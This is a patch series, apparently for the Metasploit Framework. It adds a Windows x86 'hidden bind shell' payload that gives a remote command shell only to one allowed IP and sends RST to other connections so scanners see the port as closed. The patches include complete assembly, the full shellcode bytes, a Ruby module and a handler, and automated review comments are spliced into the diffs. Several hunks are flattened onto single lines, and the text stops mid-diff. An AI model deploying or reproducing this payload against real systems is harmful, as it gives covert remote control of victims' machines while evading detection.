From b4a22aa25d0635ab9204f0f4ae1886e7da034876 Mon Sep 17 00:00:00 2001
From: root
Date: Thu, 20 Feb 2014 16:19:40 +0100
Subject: [PATCH 1/4] hidden bind shell payload
---
 .../x86/src/block/block_hidden_bind_tcp.asm | 90 +++++++
 .../single/single_shell_hidden_bind_tcp.asm | 20 ++
 lib/msf/core/handler/bind_hidden_tcp.rb | 231 ++++++++++++++++++
 .../singles/windows/shell_hidden_bind_tcp.rb | 74 ++++++
 4 files changed, 415 insertions(+)
 create mode 100644 external/source/shellcode/windows/x86/src/block/block_hidden_bind_tcp.asm
 create mode 100644 external/source/shellcode/windows/x86/src/single/single_shell_hidden_bind_tcp.asm
 create mode 100644 lib/msf/core/handler/bind_hidden_tcp.rb
 create mode 100644 modules/payloads/singles/windows/shell_hidden_bind_tcp.rb
diff --git a/external/source/shellcode/windows/x86/src/block/block_hidden_bind_tcp.asm b/external/source/shellcode/windows/x86/src/block/block_hidden_bind_tcp.asm
new file mode 100644
index 0000000000..fa8f31681a
--- /dev/null
+++ b/external/source/shellcode/windows/x86/src/block/block_hidden_bind_tcp.asm
@@ -0,0 +1,90 @@
+;-----------------------------------------------------------------------------;
+; Original Shellcode: Stephen Fewer (stephen_fewer@harmonysecurity.com)
+; Modified version to add Hidden ACL support: Borja Merino (bmerinofe@gmail.com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (February 2014)
+;-----------------------------------------------------------------------------;
+[BITS 32]
+
+; Input: EBP must be the address of 'api_call'.
+; Output: EDI will be the newly connected clients socket
+; Clobbers: EAX, EBX, ESI, EDI, ESP will also be modified (-0x1A0)
+
+bind_tcp:
+ push 0x00003233 ; Push the bytes 'ws2_32',0,0 onto the stack.
+ push 0x5F327377 ; ...
+ push esp ; Push a pointer to the "ws2_32" string on the stack.
+ push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" )
+ call ebp ; LoadLibraryA( "ws2_32" )
+
+ mov eax, 0x0190 ; EAX = sizeof( struct WSAData )
+ sub esp, eax ; alloc some space for the WSAData structure
+ push esp ; push a pointer to this stuct
+ push eax ; push the wVersionRequested parameter
+ push 0x006B8029 ; hash( "ws2_32.dll", "WSAStartup" )
+ call ebp ; WSAStartup( 0x0190, &WSAData );
+
+ push eax ; if we succeed, eax wil be zero, push zero for the flags param.
+ push eax ; push null for reserved parameter
+ push eax ; we do not specify a WSAPROTOCOL_INFO structure
+ push eax ; we do not specify a protocol
+ inc eax ;
+ push eax ; push SOCK_STREAM
+ inc eax ;
+ push eax ; push AF_INET
+ push 0xE0DF0FEA ; hash( "ws2_32.dll", "WSASocketA" )
+ call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
+ xchg edi, eax ; save the socket for later, don't care about the value of eax after this
+
+ xor ebx, ebx ; Clear EBX
+ push ebx ; bind to 0.0.0.0
+ push 0x5C110002 ; family AF_INET and port 4444
+ mov esi, esp ; save a pointer to sockaddr_in struct
+ push byte 16 ; length of the sockaddr_in struct (we only set the first 8 bytes as the last 8 are unused)
+ push esi ; pointer to the sockaddr_in struct
+ push edi ; socket
+ push 0x6737DBC2 ; hash( "ws2_32.dll", "bind" )
+ call ebp ; bind( s, &sockaddr_in, 16 );
+
+ ; Hidden ACL Support ----------
+
+ push 0x1 ; size, in bytes, of the buffer pointed to by the "optval" parameter
+ push esp ; optval: pointer to the buffer in which the value for the requested option is specified
+ push 0x3002 ; level at which the option is defined: SOL_SOCKET
+ push 0xFFFF ; the socket option for which the value is to be set: SO_CONDITIONAL_ACCEPT
+ push edi ; socket descriptor
+ push 0x2977A2F1 ; hash( "ws2_32.dll", "setsockopt" )
+ call ebp ; setsockopt(s, SOL_SOCKET, SO_CONDITIONAL_ACCEPT, &bOptVal, 1 );
+
+ push ebx ; backlog
+ push edi ; socket
+ push 0xFF38E9B7 ; hash( "ws2_32.dll", "listen" )
+ call ebp ; listen( s, 0 );
+
+condition:
+ push ebx ; dwCallbackData (ebx = 0, no data needed for the condition function)
+ call wsaaccept ; push the start of the condition function on the stack
+ mov eax, DWORD [esp+4] ;
+ mov eax, DWORD [eax+4] ;
+ mov eax, DWORD [eax+4] ; get the client IP returned in the stack
+ sub eax, 0x2101A8C0 ; compare the client IP with the IP allowed
+ jz return ; if equal returns CF_ACCEPT
+ xor eax, eax ; If not equal, the condition function returns CF_REJECT
+ inc eax
+return:
+ retn 0x20 ; some stack alignment needed to return to mswsock
+
+wsaaccept:
+ push ebx ; length of the sockaddr = nul
+ push ebx ; struct sockaddr = nul
+ push edi ; socket descriptor
+ push 0x33BEAC94 ; hash( "ws2_32.dll", "wsaaccept" )
+ call ebp ; wsaaccept( s, 0, 0, &fnCondition, 0)
+ cmp eax, -1 ; if error jump to condition function to wait for another connection
+ jz condition
+
+ push edi ; push the listening socket to close
+ xchg edi, eax ; replace the listening socket with the new connected socket for further comms
+ push 0x614D6E75 ; hash( "ws2_32.dll", "closesocket" )
+ call ebp ; closesocket( s );
+
diff --git a/external/source/shellcode/windows/x86/src/single/single_shell_hidden_bind_tcp.asm b/external/source/shellcode/windows/x86/src/single/single_shell_hidden_bind_tcp.asm
new file mode 100644
index 0000000000..cb2a14a38a
--- /dev/null
+++ b/external/source/shellcode/windows/x86/src/single/single_shell_hidden_bind_tcp.asm
@@ -0,0 +1,20 @@
+;-----------------------------------------------------------------------------;
+; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (28 July 2009)
+; Size: 341 bytes
+; Build: >build.py single_shell_bind_tcp
+;-----------------------------------------------------------------------------;
+[BITS 32]
+[ORG 0]
+
+ cld ; Clear the direction flag.
+ call start ; Call start, this pushes the address of 'api_call' onto the stack.
+%include "./src/block/block_api.asm"
+start: ;
+ pop ebp ; Pop off the address of 'api_call' for calling later.
+%include "./src/block/block_hidden_bind_tcp.asm"
+ ; By here we will have performed the bind_tcp connection and EDI will be out socket.
+%include "./src/block/block_shell.asm"
+ ; Finish up with the EXITFUNK.
+%include "./src/block/block_exitfunk.asm"
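Review bot: The two comments on the setsockopt arguments are swapped: `push 0x3002` is the optname (SO_CONDITIONAL_ACCEPT) and `push 0xFFFF` is the level (SOL_SOCKET), which is also the order the call comment right below them gives; suggest `push 0x3002 ; optname: SO_CONDITIONAL_ACCEPT` and `push 0xFFFF ; level: SOL_SOCKET`. The pushed values themselves are correct, so this is documentation only. `retn 0x20` is commented as "some stack alignment", but it is the stdcall return of the condition function, which receives eight DWORD arguments (lpCallerId, lpCallerData, lpSQOS, lpGQOS, lpCalleeId, lpCalleeData, g, dwCallbackData); a comment saying so would also make the `[esp+4]` → WSABUF.buf → sockaddr_in.sin_addr walk above it readable, since those three `mov` lines are uncommented. The constants 0x2101A8C0 (192.168.1.33) and the port in 0x5C110002 are placeholders that the Ruby module rewrites through its Offsets table (AHOST at 262, LPORT at 200); marking them as such in the comments would stop one being changed without the other.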
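Review bot: The header block of single_shell_hidden_bind_tcp.asm is copied unchanged from the original single bind shell: the Build line still names `single_shell_bind_tcp`, and the Author, Version date and "Size: 341 bytes" describe that file rather than this one (the Ruby module's EXITFUNC offset of 364 implies this payload is longer). Suggest `; Build: >build.py single_shell_hidden_bind_tcp` and either recomputing the Size line or dropping it, plus crediting the Hidden ACL modification as the block file does. The comment after the bind include also has a typo, `EDI will be out socket` → `EDI will be our socket`.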
diff --git a/lib/msf/core/handler/bind_hidden_tcp.rb b/lib/msf/core/handler/bind_hidden_tcp.rb
new file mode 100644
index 0000000000..59a59af8ca
--- /dev/null
+++ b/lib/msf/core/handler/bind_hidden_tcp.rb
@@ -0,0 +1,231 @@ +# -*- coding: binary -*- +module Msf +module Handler + +### +# +# This module implements the Bind Hidden TCP handler. This means that +# it will attempt to connect to a remote host on a given port for a period of +# time (typically the duration of an exploit) to see if a the payload has +# started listening. This can tend to be rather verbose in terms of traffic +# and in general it is preferable to use reverse payloads. +# +### +module BindHiddenTcp + + include Msf::Handler + + # + # Returns the handler specific string representation, in this case + # 'bind_hidden_tcp'. + # + def self.handler_type + return "bind_hidden_tcp" + end + + # + # Returns the connection oriented general handler type, in this case bind. + # + def self.general_handler_type + "bind" + end + + # + # Initializes a bind handler and adds the options common to all bind + # payloads, such as local port. + # + def initialize(info = {}) + super + + register_options( + [ + Opt::LPORT(4444), + OptAddress.new('RHOST', [false, 'The target address', '']), + OptAddress.new('AHOST', [true, 'IP address allowed', '192.168.1.33']), + ], Msf::Handler::BindHiddenTcp) + + self.conn_threads = [] + self.listener_threads = [] + self.listener_pairs = {} + end + + # + # Kills off the connection threads if there are any hanging around. + # + def cleanup_handler + # Kill any remaining handle_connection threads that might + # be hanging around + conn_threads.each { |thr| + thr.kill + } + end + + # + # Starts a new connecting thread + # + def add_handler(opts={}) + + # Merge the updated datastore values + opts.each_pair do |k,v| + datastore[k] = v + end + + # Start a new handler + start_handler + end + + # + # Starts monitoring for an outbound connection to become established. 
+ # + def start_handler + + # Maximum number of seconds to run the handler + ctimeout = 150 + + if (exploit_config and exploit_config['active_timeout']) + ctimeout = exploit_config['active_timeout'].to_i + end + + # Take a copy of the datastore options + + ahost = datastore['AHOST'] + rhost = datastore['RHOST'] + lport = datastore['LPORT'] + + # Ignore this if one of the required options is missing + return if not ahost + return if not rhost + return if not lport + + # Only try the same host/port combination once + phash = rhost + ':' + lport.to_s + return if self.listener_pairs[phash] + self.listener_pairs[phash] = true + + # Start a new handling thread + self.listener_threads << framework.threads.spawn("BindTcpHandlerListener-#{lport}", false) { + client = nil + + print_status("Started Hidden bind handler") + + if (rhost == nil) + raise ArgumentError, + "RHOST is not defined; bind stager cannot function.", + caller + end + + stime = Time.now.to_i + + while (stime + ctimeout > Time.now.to_i) + begin + client = Rex::Socket::Tcp.create( + 'PeerHost' => rhost, + 'PeerPort' => lport.to_i, + 'Proxies' => datastore['Proxies'], + 'Context' => + { + 'Msf' => framework, + 'MsfPayload' => self, + 'MsfExploit' => assoc_exploit + }) + rescue Rex::ConnectionRefused + # Connection refused is a-okay + rescue ::Exception + wlog("Exception caught in bind handler: #{$!.class} #{$!}") + end + + break if client + + # Wait a second before trying again + Rex::ThreadSafe.sleep(0.5) + end + + # Valid client connection? + if (client) + # Increment the has connection counter + self.pending_connections += 1 + + # Start a new thread and pass the client connection + # as the input and output pipe. Client's are expected + # to implement the Stream interface. 
+ conn_threads << framework.threads.spawn("BindTcpHandlerSession", false, client) { |client_copy| + begin + handle_connection(wrap_aes_socket(client_copy)) + rescue + elog("Exception raised from BindHiddenTcp.handle_connection: #{$!}") + end + } + else + wlog("No connection received before the handler completed") + end + } + end + + def wrap_aes_socket(sock) + if datastore["PAYLOAD"] !~ /java\// or (datastore["AESPassword"] || "") == "" + return sock + end + + socks = Rex::Socket::tcp_socket_pair() + socks[0].extend(Rex::Socket::Tcp) + socks[1].extend(Rex::Socket::Tcp) + + m = OpenSSL::Digest::Digest.new('md5') + m.reset + key = m.digest(datastore["AESPassword"] || "") + + Rex::ThreadFactory.spawn('AESEncryption', false) { + c1 = OpenSSL::Cipher::Cipher.new('aes-128-cfb8') + c1.encrypt + c1.key=key + sock.put([0].pack('N')) + sock.put(c1.iv=c1.random_iv) + buf1 = socks[0].read(4096) + while buf1 and buf1 != "" + sock.put(c1.update(buf1)) + buf1 = socks[0].read(4096) + end + sock.close() + } + + Rex::ThreadFactory.spawn('AESEncryption', false) { + c2 = OpenSSL::Cipher::Cipher.new('aes-128-cfb8') + c2.decrypt + c2.key=key + iv="" + while iv.length < 16 + iv << sock.read(16-iv.length) + end + c2.iv = iv + buf2 = sock.read(4096) + while buf2 and buf2 != "" + socks[0].put(c2.update(buf2)) + buf2 = sock.read(4096) + end + socks[0].close() + } + + return socks[1] + end + + # + # Nothing to speak of. + # + def stop_handler + # Stop the listener threads + self.listener_threads.each do |t| + t.kill + end + self.listener_threads = [] + self.listener_pairs = {} + end + +protected + + attr_accessor :conn_threads # :nodoc: + attr_accessor :listener_threads # :nodoc: + attr_accessor :listener_pairs # :nodoc: +end + +end +end diff --git a/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb b/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb new file mode 100644 index 0000000000..e63628d4bc --- /dev/null +++ b/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb 
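Review bot: The connect loop in start_handler rescues `::Exception`, which also swallows thread-kill and exit signals raised inside the spawned listener thread; `rescue ::StandardError` matches the intent of the "Exception caught in bind handler" log line. `ahost` is read only to return early when unset and is never used afterwards, so apart from registering the AHOST option this handler behaves like the plain bind handler, which is presumably why PATCH 4/4 of this series deletes the file again. Several comments no longer match the code: "Wait a second before trying again" sits above a 0.5 s sleep, "Nothing to speak of" documents a stop_handler that kills threads and clears state, and the thread names still say BindTcpHandlerListener. wrap_aes_socket derives the AES key from an unsalted MD5 of the password and uses the deprecated `OpenSSL::Digest::Digest` and `OpenSSL::Cipher::Cipher` aliases; if it has to stay, a comment should say it is a copy of the bind_tcp handler's version so fixes land in both places.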
@@ -0,0 +1,74 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/bind_hidden_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+ include Msf::Payload::Windows
+ include Msf::Payload::Single
+ include Msf::Sessions::CommandShellOptions
+
+ def initialize(info = {})
+ super(merge_info(info,
+ 'Name' => 'Windows Command Shell, Hidden Bind TCP Inline',
+ 'Description' => 'Listen for a connection from certain IP and spawn a command shell.
+ The shellcode will reply with a RST packet if the connection is not
+ comming from the IP defined in AHOST. This way the socket will appear
+ as "closed" helping us to keep our shellcode hidden from scanning tools.',
+ 'Author' =>
+ [
+ 'vlad902', # original payload module (single_shell_bind_tcp)
+ 'sd', # original payload module (single_shell_bind_tcp)
+ 'Borja Merino ' # Add Hidden ACL functionality
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' => ['URL', 'http://www.youtube.com/watch?v=xYBuaVNQjGA&hd=1'],
+ 'Platform' => 'win',
+ 'Arch' => ARCH_X86,
+ 'Handler' => Msf::Handler::BindHiddenTcp,
+ 'Session' => Msf::Sessions::CommandShell,
+ 'Payload' =>
+ {
+ 'Offsets' =>
+ {
+ 'LPORT' => [ 200, 'n' ],
+ 'AHOST' => [ 262, 'ADDR' ],
+ 'EXITFUNC' => [ 364, 'V' ],
+ },
+ 'Payload' =>
+ "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b" +
+ "\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0" +
+ "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57" +
+ "\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01" +
+ "\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" +
+ "\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4" +
+ "\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
+ "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24" +
+ "\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d" +
+ "\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07" +
+ "\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00" +
+ "\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff" +
+ "\xd5\x97\x31\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57" +
+ "\x68\xc2\xdb\x37\x67\xff\xd5\x6a\x01\x54\x68\x02\x30\x00\x00\x68" +
+ "\xff\xff\x00\x00\x57\x68\xf1\xa2\x77\x29\xff\xd5\x53\x57\x68\xb7" +
+ "\xe9\x38\xff\xff\xd5\x53\xe8\x17\x00\x00\x00\x8b\x44\x24\x04\x8b" +
+ "\x40\x04\x8b\x40\x04\x2d\xc0\xa8\x01\x21\x74\x03\x31\xc0\x40\xc2" +
+ "\x20\x00\x53\x53\x57\x68\x94\xac\xbe\x33\xff\xd5\x83\xf8\xff\x74" +
+ "\xd4\x57\x97\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89" +
+ "\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24" +
+ "\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46" +
+ "\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e" +
+ "\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xe0\x1d\x2a\x0a" +
+ "\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05" +
+ "\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"
+ }
+ ))
+ end
+
+end
From 1fda6b86a1677b40369e02a4f7e02f83b7df8d3f Mon Sep 17 00:00:00 2001
From: root
Date: Mon, 10 Mar 2014 12:13:10 +0100
Subject: [PATCH 2/4] Changed cmp eax by inc eax. Saved one byte
---
 .../x86/src/block/block_hidden_bind_tcp.asm | 5 ++--
 .../singles/windows/shell_hidden_bind_tcp.rb | 25 +++++++++----------
 2 files changed, 15 insertions(+), 15 deletions(-)
diff --git a/external/source/shellcode/windows/x86/src/block/block_hidden_bind_tcp.asm b/external/source/shellcode/windows/x86/src/block/block_hidden_bind_tcp.asm
index fa8f31681a..3b708b9c48 100644
--- a/external/source/shellcode/windows/x86/src/block/block_hidden_bind_tcp.asm
+++ b/external/source/shellcode/windows/x86/src/block/block_hidden_bind_tcp.asm
@@ -80,8 +80,9 @@ wsaaccept:
 push edi ; socket descriptor
 push 0x33BEAC94 ; hash( "ws2_32.dll", "wsaaccept" )
 call ebp ; wsaaccept( s, 0, 0, &fnCondition, 0)
- cmp eax, -1 ; if error jump to condition function to wait for another connection
- jz condition
+ inc eax
+ jz condition ; if error (eax = -1) jump to condition function to wait for another connection
+ dec eax
 
 push edi ; push the listening socket to close
 xchg edi, eax ; replace the listening socket with the new connected socket for further comms
diff --git a/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb b/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb
index e63628d4bc..c28daa8bd4 100644
--- a/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb
+++ b/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb
@@ -18,9 +18,9 @@ module Metasploit3
 super(merge_info(info,
 'Name' => 'Windows Command Shell, Hidden Bind TCP Inline',
 'Description' => 'Listen for a connection from certain IP and spawn a command shell.
- The shellcode will reply with a RST packet if the connection is not
- comming from the IP defined in AHOST. This way the socket will appear
- as "closed" helping us to keep our shellcode hidden from scanning tools.',
+ The shellcode will reply with a RST packet if the connections is not
+ comming from the IP defined in AHOST. This way the port will appear
+ as "closed" helping us to hide the shellcode.',
 'Author' =>
 [
 'vlad902', # original payload module (single_shell_bind_tcp)
@@ -28,7 +28,6 @@ module Metasploit3
 'Borja Merino ' # Add Hidden ACL functionality
 ],
 'License' => MSF_LICENSE,
- 'References' => ['URL', 'http://www.youtube.com/watch?v=xYBuaVNQjGA&hd=1'],
 'Platform' => 'win',
 'Arch' => ARCH_X86,
 'Handler' => Msf::Handler::BindHiddenTcp,
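Review bot: The new `inc eax` and `dec eax` lines carry no comment, and the jump's comment now refers to a value (eax = -1) that the preceding instruction has already changed; suggest `inc eax ; INVALID_SOCKET (-1) becomes 0, setting ZF` and `dec eax ; undo the inc, eax is the accepted socket again`. The transformation itself is sound because `inc` sets ZF and the zero-test replaces the `cmp eax, -1`. The corresponding byte change in the Ruby module (`\x40\x74\xd6\x48` replacing `\x83\xf8\xff\x74\xd4`, EXITFUNC 364 → 363) is consistent with the one byte saved.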
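Review bot: The rewritten Description introduces a grammatical regression, "if the connections is not", and keeps the misspelling "comming" from the previous version; suggest `The shellcode will reply with a RST packet if the connection is not` and `coming from the IP defined in AHOST. This way the port will appear`. The unchanged first line of the string, "from certain IP", should read "from a certain IP".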
@@ -39,7 +38,7 @@ module Metasploit3
 {
 'LPORT' => [ 200, 'n' ],
 'AHOST' => [ 262, 'ADDR' ],
- 'EXITFUNC' => [ 364, 'V' ],
+ 'EXITFUNC' => [ 363, 'V' ],
 },
 'Payload' =>
 "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b" +
@@ -59,14 +58,14 @@ module Metasploit3
 "\xff\xff\x00\x00\x57\x68\xf1\xa2\x77\x29\xff\xd5\x53\x57\x68\xb7" +
 "\xe9\x38\xff\xff\xd5\x53\xe8\x17\x00\x00\x00\x8b\x44\x24\x04\x8b" +
 "\x40\x04\x8b\x40\x04\x2d\xc0\xa8\x01\x21\x74\x03\x31\xc0\x40\xc2" +
- "\x20\x00\x53\x53\x57\x68\x94\xac\xbe\x33\xff\xd5\x83\xf8\xff\x74" +
- "\xd4\x57\x97\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89" +
- "\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24" +
- "\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46" +
- "\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e" +
- "\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xe0\x1d\x2a\x0a" +
- "\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05" +
- "\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"
+ "\x20\x00\x53\x53\x57\x68\x94\xac\xbe\x33\xff\xd5\x40\x74\xd6\x48" +
+ "\x57\x97\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3" +
+ "\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c" +
+ "\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56" +
+ "\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56" +
+ "\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xe0\x1d\x2a\x0a\x68" +
+ "\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +
+ "\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"
 }
 ))
 end
From 3c95c021d003a741896a7e0d1ae04dffbde609e7 Mon Sep 17 00:00:00 2001
From: root
Date: Mon, 10 Mar 2014 12:17:20 +0100
Subject: [PATCH 3/4] Reference added
---
 modules/payloads/singles/windows/shell_hidden_bind_tcp.rb | 1 +
 1 file changed, 1 insertion(+)
diff --git a/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb b/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb
index c28daa8bd4..57f57f712a 100644
--- a/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb
+++ b/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb
@@ -28,6 +28,7 @@ module Metasploit3
 'Borja Merino ' # Add Hidden ACL functionality
 ],
 'License' => MSF_LICENSE,
+ 'References' => ['URL', 'http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html'],
 'Platform' => 'win',
 'Arch' => ARCH_X86,
 'Handler' => Msf::Handler::BindHiddenTcp,
From 2be6b8befe3c797823bb6214bfbf27d9c8cb6dc2 Mon Sep 17 00:00:00 2001
From: Meatballs
Date: Sat, 7 Jun 2014 14:34:20 +0100
Subject: [PATCH 4/4] Remove bind hidden handler
---
 lib/msf/core/handler/bind_hidden_tcp.rb | 231 ------------------
 .../singles/windows/shell_hidden_bind_tcp.rb | 11 +-
 2 files changed, 8 insertions(+), 234 deletions(-)
 delete mode 100644 lib/msf/core/handler/bind_hidden_tcp.rb
diff --git a/lib/msf/core/handler/bind_hidden_tcp.rb b/lib/msf/core/handler/bind_hidden_tcp.rb
deleted file mode 100644
index 59a59af8ca..0000000000
--- a/lib/msf/core/handler/bind_hidden_tcp.rb
+++ /dev/null
@@ -1,231 +0,0 @@ -# -*- coding: binary -*- -module Msf -module Handler - -### -# -# This module implements the Bind Hidden TCP handler. This means that -# it will attempt to connect to a remote host on a given port for a period of -# time (typically the duration of an exploit) to see if a the payload has -# started listening. This can tend to be rather verbose in terms of traffic -# and in general it is preferable to use reverse payloads. -# -### -module BindHiddenTcp - - include Msf::Handler - - # - # Returns the handler specific string representation, in this case - # 'bind_hidden_tcp'. - # - def self.handler_type - return "bind_hidden_tcp" - end - - # - # Returns the connection oriented general handler type, in this case bind. - # - def self.general_handler_type - "bind" - end - - # - # Initializes a bind handler and adds the options common to all bind - # payloads, such as local port. - # - def initialize(info = {}) - super - - register_options( - [ - Opt::LPORT(4444), - OptAddress.new('RHOST', [false, 'The target address', '']), - OptAddress.new('AHOST', [true, 'IP address allowed', '192.168.1.33']), - ], Msf::Handler::BindHiddenTcp) - - self.conn_threads = [] - self.listener_threads = [] - self.listener_pairs = {} - end - - # - # Kills off the connection threads if there are any hanging around. - # - def cleanup_handler - # Kill any remaining handle_connection threads that might - # be hanging around - conn_threads.each { |thr| - thr.kill - } - end - - # - # Starts a new connecting thread - # - def add_handler(opts={}) - - # Merge the updated datastore values - opts.each_pair do |k,v| - datastore[k] = v - end - - # Start a new handler - start_handler - end - - # - # Starts monitoring for an outbound connection to become established. 
- # - def start_handler - - # Maximum number of seconds to run the handler - ctimeout = 150 - - if (exploit_config and exploit_config['active_timeout']) - ctimeout = exploit_config['active_timeout'].to_i - end - - # Take a copy of the datastore options - - ahost = datastore['AHOST'] - rhost = datastore['RHOST'] - lport = datastore['LPORT'] - - # Ignore this if one of the required options is missing - return if not ahost - return if not rhost - return if not lport - - # Only try the same host/port combination once - phash = rhost + ':' + lport.to_s - return if self.listener_pairs[phash] - self.listener_pairs[phash] = true - - # Start a new handling thread - self.listener_threads << framework.threads.spawn("BindTcpHandlerListener-#{lport}", false) { - client = nil - - print_status("Started Hidden bind handler") - - if (rhost == nil) - raise ArgumentError, - "RHOST is not defined; bind stager cannot function.", - caller - end - - stime = Time.now.to_i - - while (stime + ctimeout > Time.now.to_i) - begin - client = Rex::Socket::Tcp.create( - 'PeerHost' => rhost, - 'PeerPort' => lport.to_i, - 'Proxies' => datastore['Proxies'], - 'Context' => - { - 'Msf' => framework, - 'MsfPayload' => self, - 'MsfExploit' => assoc_exploit - }) - rescue Rex::ConnectionRefused - # Connection refused is a-okay - rescue ::Exception - wlog("Exception caught in bind handler: #{$!.class} #{$!}") - end - - break if client - - # Wait a second before trying again - Rex::ThreadSafe.sleep(0.5) - end - - # Valid client connection? - if (client) - # Increment the has connection counter - self.pending_connections += 1 - - # Start a new thread and pass the client connection - # as the input and output pipe. Client's are expected - # to implement the Stream interface. 
- conn_threads << framework.threads.spawn("BindTcpHandlerSession", false, client) { |client_copy| - begin - handle_connection(wrap_aes_socket(client_copy)) - rescue - elog("Exception raised from BindHiddenTcp.handle_connection: #{$!}") - end - } - else - wlog("No connection received before the handler completed") - end - } - end - - def wrap_aes_socket(sock) - if datastore["PAYLOAD"] !~ /java\// or (datastore["AESPassword"] || "") == "" - return sock - end - - socks = Rex::Socket::tcp_socket_pair() - socks[0].extend(Rex::Socket::Tcp) - socks[1].extend(Rex::Socket::Tcp) - - m = OpenSSL::Digest::Digest.new('md5') - m.reset - key = m.digest(datastore["AESPassword"] || "") - - Rex::ThreadFactory.spawn('AESEncryption', false) { - c1 = OpenSSL::Cipher::Cipher.new('aes-128-cfb8') - c1.encrypt - c1.key=key - sock.put([0].pack('N')) - sock.put(c1.iv=c1.random_iv) - buf1 = socks[0].read(4096) - while buf1 and buf1 != "" - sock.put(c1.update(buf1)) - buf1 = socks[0].read(4096) - end - sock.close() - } - - Rex::ThreadFactory.spawn('AESEncryption', false) { - c2 = OpenSSL::Cipher::Cipher.new('aes-128-cfb8') - c2.decrypt - c2.key=key - iv="" - while iv.length < 16 - iv << sock.read(16-iv.length) - end - c2.iv = iv - buf2 = sock.read(4096) - while buf2 and buf2 != "" - socks[0].put(c2.update(buf2)) - buf2 = sock.read(4096) - end - socks[0].close() - } - - return socks[1] - end - - # - # Nothing to speak of. - # - def stop_handler - # Stop the listener threads - self.listener_threads.each do |t| - t.kill - end - self.listener_threads = [] - self.listener_pairs = {} - end - -protected - - attr_accessor :conn_threads # :nodoc: - attr_accessor :listener_threads # :nodoc: - attr_accessor :listener_pairs # :nodoc: -end - -end -end diff --git a/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb b/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb index 57f57f712a..d768feaa1b 100644 --- a/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb 
+++ b/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb
@@ -4,7 +4,7 @@
 ##
 
 require 'msf/core'
